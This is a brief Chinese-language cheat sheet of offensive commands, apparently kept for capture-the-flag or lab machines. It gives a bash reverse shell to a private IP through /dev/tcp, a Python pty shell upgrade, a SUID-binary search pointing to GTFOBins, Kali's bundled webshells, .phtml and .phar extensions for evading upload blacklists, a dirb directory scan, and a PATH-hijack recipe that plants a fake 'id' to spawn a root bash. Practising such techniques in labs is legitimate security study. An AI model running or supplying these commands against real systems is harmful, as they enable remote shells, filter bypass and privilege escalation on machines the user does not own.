#切换到 bashshell
python -c 'import pty;pty.spawn("/bin/bash")'
Python3 -c 'import pty;pty.spawn("/bin/bash")'
#反弹shell
bash -i >& /dev/tcp/192.168.174.130/1234 0>&1
#查找文件
find / -perm -u=s -type f 2>/dev/null(查找有权限的命令)
GTFOBins (这个网站可以对比)
find / -name "*flag*.txt"(查找文件名)
#kail自带的webshell,访问就能反弹
locate webshell(搜索 webshell)
#php的网页后缀
.phtml、.phar等绕过黑名单
#kail扫描网站目录
dirb http://192.168.184.142/
#linux命令劫持提权(类似思路)
cd /tmp
切换到/tmp 目录
echo "/bin/bash" > id
将命令写入文件 id 中
chmod +x id
修改文件权限,增加执行权限
export PATH=/tmp:$PATH # 添加/tmp 目录到 PATH 变量中
which id
查看 id 命令的路径